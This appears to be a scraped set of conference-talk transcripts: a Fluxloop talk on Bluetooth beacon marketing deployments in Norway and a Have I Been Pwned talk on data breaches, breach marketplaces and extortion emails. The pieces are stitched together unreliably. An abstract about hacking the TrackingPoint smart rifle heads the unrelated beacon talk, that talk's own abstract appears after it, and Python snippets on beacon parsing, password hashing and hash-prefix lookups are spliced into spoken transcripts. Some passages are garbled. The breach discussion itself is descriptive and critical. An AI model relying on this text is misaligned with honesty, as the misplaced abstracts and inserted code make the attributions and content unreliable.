The TrackingPoint precision-guided firearm can follow targets, calculate ballistics and drastically increase its user's first shot accuracy. I spent a year hacking it. I showed how an attacker can modify values on the scope, force the shooter to miss the shot, and permanently alter the way the firearm behaves. In this talk, I will discuss 10 things I learned from this project.
10.5446/50526 (DOI)
Hi, everyone. My name is Ulrik. I'm one of the co-founders of Fluxloop. We started off four years ago and went from being a traditional IT consultancy to wanting to focus on creating unique user experiences within a physical context. We quickly found that beacons would be useful for doing that, and we created the service called Pinch. The reason it's called Pinch is that we want to get the attention of the people whose location we know, because Fluxloop is all about proximity, about knowing where people are. We have four main areas of focus at the moment. I'm going to give you a brief introduction to what the service is, and then I'm going to show you where we have used it in Scandinavia. So it's mostly going to be actual cases, and I'm going to do some demonstrations as well. But first: we created a proximity SDK that we can put into existing mobile applications, so we can communicate with beacons and understand where they are. And we're trying to get that SDK into as many applications as possible, because we're also sharing anonymous data. I'm not going to talk a lot about that part, or the security and privacy parts of this whole complex proximity business, but those are definitely parts that we are quite interested in and working a lot on. Then we're also building a beacon network of fixed installations within transportation, in shopping malls, in cinemas, and all kinds of areas. And when you have volume on both the applications with our SDK and the beacon network, you gather a lot of data. That data you can use for all kinds of stuff; as the previous presenter mentioned, if you combine IoT sensors and senders with data, you can create quite unique user experiences. So we're using a lot of this data to help make better communication, and also often marketing. I'm going to show you a bit about that in a second.
So when I was invited here to talk about our services and what we're doing, I was a bit unsure whether or not to do this slide, because I guess people going to an IoT conference would probably know how beacons work, for example. But it's interesting, because people who say they know how this works often tend not to. So I'm going to do it anyway. It might be boring for some of you, but I'm going to do it anyway. So you've got a beacon, and it uses Bluetooth to broadcast some IDs. In this case, we just call it ID number nine. And then you've got the mobile phone, which has Bluetooth enabled. And it's actually the operating system on the mobile phone that's looking for beacons at all times. So iOS or Android will recognize ID number nine, and it will check whether or not there are applications subscribing to ID number nine. If there are, we can open or do some actions based on that. For example, in this case, we've got the H&M application that will be triggered and do something when it's near ID number nine. So, as I mentioned, Bluetooth is of course important. It has to be enabled. And do you know, well, how many people here do have Bluetooth enabled at all times? Yeah, it's an IoT conference, right? We do a survey each year to figure out how many people actually are using Bluetooth and have it enabled at all times. In 2014, we saw that 27% had it on at all times. Last year, we saw it was 31%. But since we do have our database with a lot of users, we also see that within that user base, 43% actually have Bluetooth on at all times. Most of those are actually Android users. I don't know why, but that's what we see. Also interesting is that almost 70% of those who chose not to have Bluetooth enabled have had it enabled within the last 30 days, within the last month. So people are turning it off and turning it on.
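The "ID number nine" the operating system matches on is, in the iBeacon format, a UUID plus a major and minor number packed into a fixed 25-byte manufacturer payload. Here is a sketch of parsing that payload, plus the usual log-distance estimate apps derive from signal strength; the example UUID is arbitrary:

```python
import struct
import uuid

def parse_ibeacon(mfg_data: bytes):
    """Parse Apple's 25-byte iBeacon payload: UUID + major + minor + tx power."""
    if len(mfg_data) != 25 or mfg_data[:4] != b"\x4c\x00\x02\x15":
        return None  # not an iBeacon frame
    region_uuid = uuid.UUID(bytes=mfg_data[4:20])
    major, minor = struct.unpack(">HH", mfg_data[20:24])
    tx_power = struct.unpack("b", mfg_data[24:25])[0]  # calibrated RSSI at 1 m
    return region_uuid, major, minor, tx_power

def estimate_distance(rssi, tx_power=-59, n=2.0):
    """Log-distance path-loss model; n grows in crowded or cluttered spaces."""
    return 10 ** ((tx_power - rssi) / (10 * n))

# "ID number nine" could be minor=9 under some app's region UUID:
frame = (b"\x4c\x00\x02\x15"
         + uuid.UUID("f7826da6-4fa2-4e98-8024-bc5b71e0893e").bytes
         + struct.pack(">HHb", 1, 9, -59))
```

An app subscribes to the UUID, and optionally the major and minor values, which is exactly the "subscribing to ID number nine" step above. The distance estimate is rough at best, since the environment factor n changes with every wall and body between beacon and phone.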
So I'm going to jump directly into a very traditional beacon scenario and something we delivered for Netcom, now named Telia, last spring. We installed beacons at their shops around here in Oslo. And when users with the Netcom application went past their shops, they got a message, a push notification; you clicked on it, and you could get this coupon. They gave away battery packs. And the test was basically to figure out whether or not we're able to get people into the shop. That's what it's all about for the shops. And 50% of those who got that message also went into the shop and used the coupon, the voucher. And you could say, well, of course they did, because it was free. They got a free battery pack. Well, I agree. Although we also see that as a telco, they know a lot about the users, so they would be able to communicate relevant messages to a specific user. I should get a different message since I have an Android phone, and another guy should get a specific message based on his iPhone. So it's all about the relevance of the message that you send. And we see in other countries that the results are between 40 and 60% on these kinds of campaigns, as long as they're relevant. Another fact is that we saw that people got this message in the morning when they were going to work. They did not go into the shop at that time; they went to work. And when they went home after work, they went into the shop. That's useful information for Netcom. We also saw that there were a lot of people who were not Netcom customers, but they had the application. And they went into the shop and wanted to get a free battery pack. And Netcom gave them free battery packs, but they also managed to turn a lot of those users into Netcom customers. And that's a good story for telcos. Two weeks back, we worked with by:Larm, a festival with a lot of concerts here in Oslo, and we worked together with Norsk Tipping.
They wanted to do their concept where they call people and say that they have won money. It's a nice concept. So within the application of BueleM, you registered your phone number. And if you were at the festival near the concert arena, they turned down the music and called people that were actually in the concert area. So we used the knowledge about where people are. They had opted in and wanted to participate in the lottery. And Norsk Tipping were there and called actual users. That was quite fun. Another case we've done for another telco, Telenor. At the national soccer arena, Ullevaal, we installed beacons at all entrances and all around where people are seated. And when a Telenor user with the Telenor application went to the arena, we sent a push notification and a coupon like this, where you got a free coffee and a free, I don't know the English term for it actually, this piece that you can sit on. And you could just get that in the shops and kiosks. So this is quite an interesting case, because we installed beacons all around Ullevaal the week before, when there were no people there. On a beacon you set a frequency for how often it sends the ID, and you also specify the strength of the signal. And when Ullevaal is empty, well, you set the frequency at some level and the strength at some level. But when there are 28,000 people there, the radio signal is absorbed by all the bodies. So we were not able to reach as many as we wanted the first time. We did it during two matches. One was Norway versus Hungary, and the other one was the Cup Final the week after. So the first time we were not able to reach as many as we wanted. We didn't manage to give away enough coffee. But the week after, during the Cup Final, we managed to give away a lot of coffee, and the kiosks actually ran out of coffee. So that was a big success the second week. So this one, even though it says H&M, we don't have them as a customer yet.
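An aside on the crowd effect just mentioned: beacon range is commonly estimated with a log-distance path-loss model, and thousands of bodies absorbing the 2.4 GHz signal effectively raise the path-loss exponent, so the same transmit power covers a much smaller area. The numbers below are illustrative, not measurements from the actual stadium deployment.

```python
# Log-distance path-loss sketch: distance from a single RSSI reading.
# measured_power is the calibrated RSSI at 1 m; n is the path-loss exponent
# (around 2.0 in free space, noticeably higher in a dense crowd).

def estimate_distance(rssi, measured_power=-59, n=2.0):
    """Rough distance in metres implied by one RSSI reading."""
    return 10 ** ((measured_power - rssi) / (10 * n))

# Same -75 dBm reading, empty venue vs crowded venue:
empty = estimate_distance(-75, n=2.0)    # ~6.3 m
crowded = estimate_distance(-75, n=3.5)  # ~2.9 m, the signal dies off faster,
                                         # so the same reading means "closer"
print(round(empty, 1), round(crowded, 1))
```

This is why a configuration tuned in an empty stadium under-reaches on match day: the beacons' advertising power and placement have to be chosen for the crowded case.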
But this is a relevant scenario. And I'm going to explain how we are working together with Clear Channel and their digital out-of-home screens. The scenario here is that I'm typically at home using H&M's mobile application. In this case, I found those trousers. I like them and I'm going to put them into the basket. A big problem for mobile retail is that a lot of people are not actually fulfilling the whole purchase within the mobile channel. Many are using the basket just for storing their favourites. So the next day, and I'm going to switch to a demo here, I go to, for example, the Storo shopping mall here in Oslo. And you go past a Clear Channel digital advertisement screen. This is typical. I've been disconnected from the internet during my presentation. Just give me a second. All right. There we are. So, this illustrates two Clear Channel screens at Storo. And we know that I looked at those trousers yesterday. I thought they were quite nice. And when I go past one of those screens the next day, I will typically be retargeted by the screens. And you will see that the H&M advertisement will occur. Just give it a second. Hopefully I'm still online. If not, that's a problem. I'm not. Okay. Sorry about that. Looks like I'm not connected to the internet. And that's a huge problem, as we all know. Just a second here. Where are we? There we are. No, it doesn't seem to work. It's coming up. It's coming up. So, there's my, thank you. We're going to come back to that test. Okay. I can talk more about another customer of ours, which is Dyreparken, the amusement park in Kristiansand. Last year we rolled out beacons all over the amusement park. They wanted to know where people are, where they are moving, and what's the dwell time at different areas. They did not want to do as Netcom or Telenor did; they did not want to push out commercial advertisements.
You see here that there are a lot of beacon zones. And down at the left, every day, the lions are being fed. So that's a very, very popular show to watch. But people who go to the park tend not to have a very precise plan for what they're going to do. So what's important for the park is to make people go to the lion show. So what we did throughout the park was to give that kind of information, like this. We didn't send it to those that were immediately near number 17. We sent it to those in other areas, typically 15 minutes before the show started. So if you were in area 37 or area number 2 or number 8, you would get that message. And we saw that it was relevant, because people were actually moving from those areas to the lions and actually saw the show. And Dyreparken knows that people love that show, and as the park would say, it creates happy, happy customers. And when they had been to those shows, we also saw that we could send them a question: please give that show a rating. Did you enjoy it? Dyreparken had 20,000 visitors a day during July, plus half of June and half of August. We reached 6% of those, and we sent approximately 5 messages to each and every user during the day. And then the typical discussion: how many messages is too many, etc.? Well, one person clicked on the link down at the right here, which says, don't send me more messages. So the messages here were very relevant, and we don't know where the threshold is. But people were rating and giving a lot of feedback in general, so 30% were actually responding to this. That gives Dyreparken a lot of knowledge about how people are enjoying their amusement park. That's important. As a result, Dyreparken will end the traditional survey they have been doing for 25 years and move over to this kind of service. And the plan was now to show you another demo as well, depending on whether or not I'm online. So let's see. If not, I will just continue.
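The targeting rule just described, notify visitors who are elsewhere in the park about 15 minutes before the show rather than those already at the lion enclosure, can be sketched like this. The zone numbers match the talk; the user names and data shape are made up for illustration.

```python
# Sketch of the zone-based targeting rule: 15 minutes before the show,
# message everyone who is NOT already at the show zone (number 17).

SHOW_ZONE = 17

def users_to_notify(current_positions, minutes_until_show):
    """current_positions: dict of user -> current zone id.
    Returns the users who should get the reminder."""
    if minutes_until_show != 15:
        return []
    return [user for user, zone in current_positions.items() if zone != SHOW_ZONE]

positions = {"anna": 37, "bjorn": 2, "carl": 17, "dina": 8}
print(users_to_notify(positions, 15))  # carl is already at the show zone
```

The point of the rule is relevance: the people at zone 17 don't need the message, and everyone else gets it with just enough lead time to walk over.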
Thanks. The technology is not being too kind to me. When we get this information, it's interesting to see how we can visualize it and show it to our customers. For Dyreparken, we did that like this. And here you'll see people moving around. This is actually not Dyreparken; it's a conference that we have put beacons on as well. But here you see that the dots are people moving from one area to another at a conference. And you see the day and you see the time as well. They're obviously eating at eight o'clock. But there were meetings around six o'clock, and you see people going outdoors into mingling zones, etc. We're doing this for Dyreparken as well, in a different setting, and what's interesting is that we see that people use the whole of Dyreparken. So it's a fairly even spread of people moving around. But in a conference context, that is totally different, as we see here. People are moving like sheep, right? And we did this for a conference at the Norefjell Hotel. And we also made a service on top of that. This was also for Telenor. So we looked at the people participating in the conference. We saw the data we had about them and where they were moving around. And then we did some analysis on top of that, figuring out who should meet. So we call it Tinder for events and conferences. And that was quite popular. We saw that people were actually meeting up. It was quite easy to make them do that because they were all Telenor employees. But still, the feedback was quite nice. So in this case, Knut Ivar got a message: hey, you should meet Frode. This is his picture. These are his interests, such as skiing, biking, family, and friends. And that's information that we gather both from his whereabouts at the conference as well as what he has given us before he entered the conference. This is something we're looking into doing in different contexts as well. But a conference is a very isolated and good place to do that.
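Movement traces and dwell times of the kind visualized here can be derived from raw beacon sightings. A minimal sketch follows, with a made-up data format (a chronological list of timestamped zone sightings for one visitor); the real pipeline would of course handle many visitors, gaps, and noise.

```python
from collections import defaultdict

def dwell_times(sightings):
    """sightings: list of (timestamp_seconds, zone) in chronological order.
    Returns total seconds spent per zone, attributing the gap between two
    consecutive sightings to the zone of the earlier one."""
    totals = defaultdict(int)
    for (t1, zone), (t2, _) in zip(sightings, sightings[1:]):
        totals[zone] += t2 - t1
    return dict(totals)

# One visitor's (illustrative) trace through three zones:
trace = [(0, "entrance"), (120, "lions"), (1020, "lions"), (1200, "cafe")]
print(dwell_times(trace))  # {'entrance': 120, 'lions': 1080}
```

Summing these per-zone totals over all visitors gives the dwell-time heatmap, and the zone-to-zone transitions in the same data give the movement animation.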
And we put up screens showing who was in which areas. And we saw that people were actually looking at those screens. Okay, everyone else is now in the restaurant; I should move there as well. So people are actually using the infographics to understand where everyone else is and moving there as well. As you understand, we're working a lot with Telenor. And the last thing we're doing with them at the moment is helping Telenor communicate with their employees through their application. So we have installed beacons at all offices around Norway, even in Svalbard. So it's probably the northernmost beacon in the world. And they want to communicate with their employees, for example, when they're in the social area, grabbing a coffee at lunch, etc. And they're going to communicate the new strategy that they are just rolling out, which is a strategy until 2020. And there are a lot of interesting aspects to this case. Privacy was mentioned earlier today. It's even stricter in an employee context. So we've been working a lot with that. And we also created a privacy dashboard where you can specify explicitly what kind of data you want to share with your employer in this context. So an example of that would be that if you enter an elevator at Fornebu, the headquarters of Telenor, and you're a Telenor employee, you would get an elevator pitch by the CEO of Telenor on your mobile phone. Those were the cases I was going to show you. I'm sorry the demos are not working. You can come up here afterwards and I can hopefully show them to you. And thank you. Any questions? No. Thank you.
Ulrik will show and tell you about actual deployments of proximity services from real cases in Scandinavia, from traditional retail beacon solutions to more advanced proximity-triggered communication through different digital channels, covering consumers as well as internal business communication. Did you know that content on digital ad screens is being shown based on your online and offline behaviour?
10.5446/50531 (DOI)
I'm going to start my presentation without the screen because otherwise we might be waiting here for quite a while. So let us have a look at this. So what I want to talk about today is, I run this service called Have I Been Pwned. Does anyone use Have I Been Pwned? Who's using it? Keep your hand up if you're in the data breaches. All right. Just the security guy. Oh, one other guy. What are you guys in? Which ones? Adobe. Adobe. Who's in Ashley Madison? That's exactly what you say when your significant other says, were you in Ashley Madison, darling? No. Ashley what? So I was in Adobe originally. I was in Patreon. So Patreon, the crowdfunding platform for fledgling artists. I was supporting a guy who does a podcast about security where he talks about data breaches, and he asked me to sign up to Patreon in order to give him like $5 a month. And then Patreon got hacked, which he got to talk about on the show, because it all kind of went round and round. I was in 000webhost as well. So they had 13 million accounts which were leaked in about November. 13 million accounts with plain text passwords as well, which wasn't a real good look. But what's really interesting is that a few months ago I realized, as I was sort of going through and getting these data breaches and loading them into the system, that I was seeing some really, really interesting things. So really interesting discussions with everything from the organizations getting breached, to the people trading the data, to the hackers actually hacking into the systems, and even to authorities. Oh, we're getting somewhere. So while it warms up: even having some interesting discussions with the likes of the FBI. And I thought, this would make a really good talk, because there's a lot of stuff that happens behind the scenes which people don't normally get to see. And now I can actually show you what those discussions look like, which is good.
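On the plain text passwords point: the standard alternative is a salted, deliberately slow key-derivation function, so a stolen database doesn't hand attackers directly reusable credentials. A minimal sketch using PBKDF2 from the Python standard library; the iteration count is illustrative, and real systems should follow current guidance on parameters.

```python
import hashlib
import hmac
import os

# 000webhost stored passwords in plain text. This is the minimal alternative:
# a random per-user salt plus a slow key-derivation function, so a leaked
# database can't simply be read out and replayed against other sites.

def hash_password(password, salt=None, iterations=200_000):
    """Returns (salt, derived_key) for storage."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest

def verify_password(password, salt, expected, iterations=200_000):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, expected)  # constant-time compare

salt, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))  # True
print(verify_password("hunter2", salt, stored))                       # False
```

Even this baseline would have changed the economics of the 000webhost leak: instead of 13 million ready-to-use passwords, attackers would have had to crack each salted hash individually.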
Now if you are interested in doing the Slido thing, that's what you need. So Slido.com, I think there's an app, and you need that number, 1853. And if you use that, then you can ask questions that are related specifically to this event, which will work well. So now, getting into the original intention of the talk. This is what I called it. And this was some months ago and I thought, wow, 220 million. Like, this is a lot. I'll do a talk and I'll call it what I learned from 220 million breached records. And then while I was preparing the talk, I had to change the name of it because everything changed again. And suddenly it wasn't 220 million, it was 235 million. So, okay, I changed the name of the talk. And then a little bit more time went by and I had to change the name of the talk again. And it was getting so many, I went, I can't put an exact number on it. We'll just say a quarter of a billion. And I think now it's actually 269 million. I did this talk in London last week as well. And since then, there's about another 10 million records in there. So every time I go to do this talk, the thing changes. But I think that's sort of kind of the point as well, right? Everything is moving ahead really quickly. So this is the system I mentioned, Have I Been Pwned. That's out of date. There are two more data breaches now, with about another 10 million odd records in there. And if you haven't seen it before, it's very simple. Data gets hacked, it gets published publicly, usually by the hackers. I download it from publicly available locations and I make it searchable. So you can go through and say, where has my account been exposed? Which is kind of neat, because then you see all the different places your information gets leaked. If it's a really sensitive data breach like Ashley Madison or Adult Friend Finder, then I make sure that you only get to find out if you're in there if you can receive an email confirmation.
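An aside on how a breach-lookup service can avoid learning the exact value it is asked about: hash locally and send only a short hash prefix, then match the returned suffixes on the device. This is the k-anonymity range-query idea HIBP later adopted for its Pwned Passwords API; the snippet below only sketches the client-side splitting with a well-known SHA-1 test value, and is not a real API client.

```python
import hashlib

# Privacy-preserving lookup sketch: the client hashes the secret locally and
# sends only the first 5 hex characters of the SHA-1. The server returns all
# suffixes sharing that prefix; the client checks for a match locally, so the
# service never sees the full password.

def sha1_hex(password):
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()

def split_for_range_query(password):
    digest = sha1_hex(password)
    return digest[:5], digest[5:]  # (prefix sent to server, suffix kept local)

prefix, suffix = split_for_range_query("password")
print(prefix)  # 5BAA6, the only thing that would leave the device
```

Each 5-character prefix covers hundreds of real hashes, so the server learns almost nothing about which specific value was queried.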
So you can't go and search for your significant other, your co-workers, your boss. Although there are other companies that encourage you to do that, and that's one of the things I'm going to show you today. So one of the things that's interesting when we talk about data breaches is the perception of hackers. And we get a lot of feedback via the media about what hackers are like. It's kind of curious; you can learn a lot from Google. If you go to Google Images and you search for hacker. Now this is curious because there's a trend here, right? So hackers, and you see this on like every single newspaper, every single website that talks about hackers. What we know of hackers is: they have hoodies, they have Guy Fawkes masks, they work a lot in binary as well. Curious fact. There's also a lot of green. And then some news stories sort of put all those things together and they go, this is a hacker. It's a Guy Fawkes mask with a hoodie with binary. And this is like sort of the ultimate personification of what the hacker is. Now we also see a lot of stuff about hackers in promotional material. So a lot of companies are making a lot of money out of the fact we get hacked, and they want to make people kind of scared. So they do stuff like this. This is a Kickstarter for a little device called CUJO. And here's what they do in their adverts. You may not know it, but you've probably already been hacked. Thousands of hacking attacks occur each day. Sounds scary, doesn't it? Listen to the music. You may not know it. You've already been hacked. And he's got a hoodie because he's a hacker. But here's the interesting thing, right? Like, have a look at what he's typing into. This is a zoomed-in bit. This is not a terminal. This is a browser. He's hacking in the browser. And I want to show you how you can impress your friends and colleagues with how you hack in the browser. What you do is you go over to hackertyper.net.
Okay? And what you've also got to do is press F11 to put it in full screen, because then it looks pretty serious. And then this is how you hack. This is real. You've got Hacker Typer and you just hit keys. And it does this. I zoomed in on the code block, and it is from Hacker Typer. They are selling their device on the premise that this is what a hacker is: you can Hacker Typer to hack. Anyway, there are all sorts of websites that do exactly this, and all sorts of news articles and things that basically prey on the fear of people by using resources such as Hacker Typer basically just to scare people, which is kind of sucky. Now this is the reality of it, right? So this is the reality of who the hackers are. This is Jake Davis. He was 19 in that photo. He was part of LulzSec in 2011, going around hacking lots of things. Look at his mum. How do you think his mum feels? They're in court, right? It's like a death stare. He's so grounded. He's really grounded. But he did a lot of damage. He's a 19-year-old kid. Another kid, same sort of deal. Also in court, also with his mum. His mum doesn't look real happy either. But this is what happens, right? It's these kids going around breaking into things and clearly making their mothers very, very upset. And the interesting thing about this is this is what hackers are normally like. This is Anonymous, right? This is kind of the sophistication level of the people that are breaking into these systems. And we kind of lose track of this a little bit. And then we see the media and we see the scary hoodies and things. Including when we see the bravado; the two kids in the previous shots were very much talking about how powerful they were, how unbeatable they were, how they could break into anything. You know, very, very bravado sort of behaviour. And clearly it didn't work out real well for them. Now this was a really good example. Did everyone see TalkTalk in the news just a little while ago?
So TalkTalk is an English telecommunications company, and TalkTalk had a major security incident. They had a whole bunch of data sucked out. It was in the news. It was in the news a lot in Australia, so it must have been really, really big in the UK. And after the attack, this detective came out and he said, okay, here's what it was: it was Russian Islamic cyber jihadis. That's terrifying. It's like every single buzzword. Is anyone here Russian? Right, good. So I get the impression that Russians are scary. Like, they sound scary. So we've got that. Obviously an Islamic cyber jihadi also sounds very scary as well. So this was the news, you know, trying to get everyone scared about these Russian Islamic cyber jihadis out there. Now here's what it really was. A 15-year-old boy in his bedroom, because where else is he going to be, right, if he's hacking away on computers? So there was him. There was also a 16-year-old boy, a little bit older. And then there was this really, really old guy. He was like 20. This is the senior citizen of the hacking circles. And the thing about it is that all these guys are the ones that broke into these systems. It wasn't the scary Russian Islamic cyber jihadis. It was just bored kids. And very frequently, when I get data from people and get communications from people, I realize that it is just bored kids. And they often turn into scared kids too. I'm going to give you an example of that. Now monetization is a really interesting one, because people want to make money out of data breaches. You can go to online marketplaces and buy data. You can buy credit cards. You can buy social security numbers for people in the US. You can buy dates of birth. You can buy all of these different attributes online. Elections are about a dollar each. You can find these sites sometimes on the clear web, very often on Tor. You open up the Tor browser, you plug in a URL, and there's a marketplace. The marketplace has sellers. The sellers have ratings.
There are transactions. There's feedback. It's just a normal marketplace. It is like eBay, but for data breaches, drugs, guns, all this sort of thing. So all this sort of data has a value. Now it's interesting when I see things like this. So I get messages from people saying, I've got something I'd like to sell to you. So in this case, the guy wanted to sell Nexus Mods. It was a forum. I would like a sum of Bitcoin. They're coming to me thinking I'm going to pay them money. And of course I never do. I go, okay, I'm not going to be part of your illegal activity, and then I document the whole thing on Twitter as well, because sooner or later your account's going to be seized after you get caught if you're the one going around doing this sort of stuff. Now curiously, since I created this deck just last week, someone did actually give me Nexus Mods. They said, here you go. We've been trading this in the underground forums. You might find it useful for your site. So eventually this sort of stuff turns up anyway. Now there's another good example. OPM, the Office of Personnel Management. This was a big breach in the US. Have a look at how much they reckon it's worth: more than 100 Bitcoin. Bitcoin at the moment is about 300 US dollars, so maybe $30,000. I don't know, like, it's one guy on Twitter, but I've got other examples of the prices these things are being sold at. And when you think about it, the sort of data that was leaked about government personnel is pretty sensitive info. It's definitely got a price, probably a high price. So this sort of thing comes up quite a bit. This was after the 000webhost breach. So 000webhost got breached, and the data actually got traded quite significantly last year. It looks like it got breached in about March, and eventually I got the data via a journalist later on in the year. And I put a question on Twitter, a very vague question: anyone have an account on 000webhost? And this guy got in contact with me via direct message.
And this I found really interesting, because he says the database is private and it's better kept that way. Now what he means by private is that someone had hacked into it and they were trading and selling it between themselves. That's what private was. They didn't want it to be traded and sold or publicized by anyone else. They wanted to keep it quiet. And they want to keep these data breaches quiet, because whilst they're quiet and the victims don't know about it, the victims can be exploited. Once the victims know that 000webhost was hacked and the password they used there has been exposed, and remember, it's stored in plain text, so no cryptography whatsoever, the same password they use on other accounts, once the victims know, the value goes down. He also said this: selling for upwards of $2,000 right now. I can't understand which moron would be considering just giving you a copy. Maybe a moron with a conscience; it could have been that. Because this is the thing: basically what he's saying is, we are going around exploiting the people that were compromised in this data breach. What moron would want to stop that from happening? Like, this is the level of ethics and morality of a lot of the people that are dealing with this data. Now 000webhost was also for sale on other sites. This is a site that sells that sort of data. You can see it sells a few different things here. 000webhost was selling for $1,500 at the time this particular incident broke, in fact, just before it went public. Another guy said $2,000; 000webhost here, $1,500. After I made it public, and there was also a long lead-in to this where I was trying to get in touch with the company, they wouldn't respond, and eventually we made it all public. After it went public, it went from $1,500 down to $200. Because suddenly the value goes right down. So whilst it's private and the victims don't know about it, they can exploit the victims.
Once it's public and the victims know, the value goes down. Then it went down even further. So it's now wiped off 90% of the value, which I'm kind of happy about. We have screwed the market for this data breach, which is good. We don't want it being monetized in that way. Here's another good example of monetization. So this goes back to Ashley Madison again. When the Ashley Madison breach happened, we go back to July. And in July, hackers came out and they said, we have broken into Ashley Madison. We have all the data; either shut the site down or we're going to dump it all publicly. And of course they never shut it down. They were never going to shut it down. So it did go public. It went public in August. And after it went public, a bunch of companies started monetizing the data. Now in the case of a data breach, there are things that can be legitimately monetized. People are scared. They need things like identity theft protection. It's not a bad thing to have anyway, let alone after a data breach. But then we had companies like this, Trustify, who took the data, and the data was really broadly torrented. It would take any of you about five minutes to find that data, and then about five hours to download it, because it was pretty big. Five hours on Australian broadband speed, maybe half an hour in Norway. But the data is really easily available. So companies were downloading it and then creating services that made money from it. So what these guys are doing is saying, hey, check if you've been exposed. And this is not dissimilar to what I do with Have I Been Pwned. The difference is Have I Been Pwned is all free. People go in there; I don't make any money out of the fact that the public can do that. But what happened here is these guys allowed you to search for anyone. And then after you searched for them, they sent an email to the person you were searching for. So imagine this. You've got a wife suspicious of a husband. And this was the gender split.
There's no gender equality in Ashley Madison. It was almost all guys and fembots. So a fembot is basically just computer code which engages in discussion. In fact, they even called them engagers. The engagers would get them into chat and get them to pay more money to stay on there, because they think they've got a chance of meeting a girl who is not their partner, who they're meant to be married to, because the whole thing was meant to be about having affairs. So anyway, you've got this situation. The wife searches for her husband and gets an immediate confirmation on the screen that the husband was in the data breach. The husband gets an email. He's not the one who searched for it, but he gets an email. So the first the husband knows of him being in the data breach is when he finds out that someone is actually searching for him in the data breach. Imagine that. So sort of suspend your moral judgment for a moment, regardless of how you feel about adultery. The very fact is that his privacy is violated in this way, where anyone can go and search for him and now he's getting an email; it could have been his boss searching for him. And he gets an email. And of course, what they're trying to do here is solicit business. They're trying to sell private investigation services so that this guy can get his data removed from the internet. And that's what they're trying to do, get your data removed from the internet. How likely do you reckon that is when it's been torrented nonstop around the world? Never going to happen. So they did that. That alone was shitty. They also did this. After you searched for someone and then you found them, there were social icons that allowed you to tweet that you'd found them. Now this is bad, but you can almost understand it insofar as, yeah, I found my ex-husband, you know, screw him. But what about this? I found my friend. These were preloaded social messages. This wasn't the person going, I'm just going to type in, I found my friend.
Trustify presented you with the buttons so that you could say, I found my ex. I found my friend. You can search too. They're encouraging other people to go through and search and find their ex and find their friend. And the privacy implications of this are just sort of mind-blowing. It seems that once that data goes out, it's like, you know, all bets are off. You can do whatever you want with it. So they were making money in a really, really underhanded sort of way. And they eventually did reverse quite a bit of this. They got a lot of pressure, a lot of public pressure. I wrote something, which is where I got some of those screenshots from, saying how bad it was. And then they started getting death threats. Like, that's how the community reacted. They got some really, really nasty messages back. Fortunately, none of them got killed as far as I know; I wouldn't want to feel partly responsible for that. But it gives you an indication of just how badly this was perceived by the community as well. I mean, on their behalf, just a really poor reading of the market and how people respond to these incidents. So that was that one. The other thing that came out of Ashley Madison was stuff like this. This is a ransom email. Now, if you ever think about it, a bunch of you are probably developers, security professionals; you're used to writing scripts and things. How hard would it be to just enumerate through a great big file and do a mail merge? Because this is all it is. It's a mail merge. It's a ransom message, but it's also got a little bit of spearphishing to it, because it's got information that is very particular to the victim: their name, their address, the last four digits of their credit card number. If you got this, it's asking for five bitcoins as well. That's a lot. That's like $1,500. And if you don't do that, they're going to let your Facebook friends know and your boss know and all that sort of thing.
Now of course, the thing about all this is that if you didn't pay, nothing ever happened, because this is just like: randomly send 30 million odd emails to everybody, and then some people will pay. A fraction of a percent will pay, and that will be a good earner; for the 99-whatever percent that don't pay, nothing happens. But what some of these messages were saying is that this Bitcoin address is unique to you. And I had a lot of people email me, because I wrote a few things that got a lot of press. These people would email me and they'd say, please don't share my Bitcoin address. I don't want anyone else to know. So I'd Google it, and you get all these results from all these other people saying, I just got this ransom message. So the Bitcoin address was not unique. They were not tracking payments. There was no recourse if you didn't pay. But they're scaring the hell out of people, and these are still going on today. So we're like five, six months on, and these messages are still going out to victims, because they're so easy. It's just sending email. Now one of the other things that I found very interesting when I thought about the experiences with Have I Been Pwned is how I actually find data breaches. So where do I get these things from? And there's not one answer. They come from multiple different places. So a good example is that often I'll get a message like this. So this is how I got the 000webhost data. This guy sends me an email and says, hey, five months ago, this was in October, so back at about March or something, I've got this data. Would you like a copy of it? And in fact, what he said is, I'll give you the 2 million version. So there's actually 13 million; I'm going to give you the 2 million. He sends me a Mega link. So Mega, Kim Dotcom's service. Often people share data breaches via Mega, because it's very easy to upload the data there. They upload it anonymously. It's on a great big obfuscated URL.
If you don't have the URL, you're not going to find it. Very, very easy for them to distribute data that way. So he sends me this, and: do not give me any credit for this. So what he's actually saying is he doesn't want anyone to know that it was him who had the data. And I'll show you a follow-up message from him in a moment. He had actually sent me the 13 million version, so I got the full data set. And this was kind of the first we knew of it, back in October. I'm 99% sure they don't know they got hacked, too. They didn't know. They had no idea. And I tried really, really hard to get in touch with 000webhost. I sent multiple email messages. I went through their ticketing system. I had people respond to me on the ticketing system, and I'm saying, look, I've got a serious security incident. I want someone to talk to; give me a security contact, because I don't know who's manning the help desk. You know, some low-paid worker on the other side of the world in an outsourcing center. Is that the person I want to give information on this to? Anyway, eventually, when we found we couldn't get in touch with them, that's when it went public. But with this guy, later on, after it got a lot of press, because once it did go public the media picked it up and the stories were all over the place, I got this. And when I read this last line in particular, I'm afraid they would still look for me, it sounds like a scared kid, right? It's probably the same sort of kid as what we saw in those earlier photos. Some kid in his bedroom in Northern Ireland or wherever, who's just been handing this data around. And what struck me with it is, I don't think that they are aware of the ramifications of what they're doing. They're sitting there in the comfort of their own bedroom and they're sharing this information around, having chats, without any sort of sense of the real-world consequences.
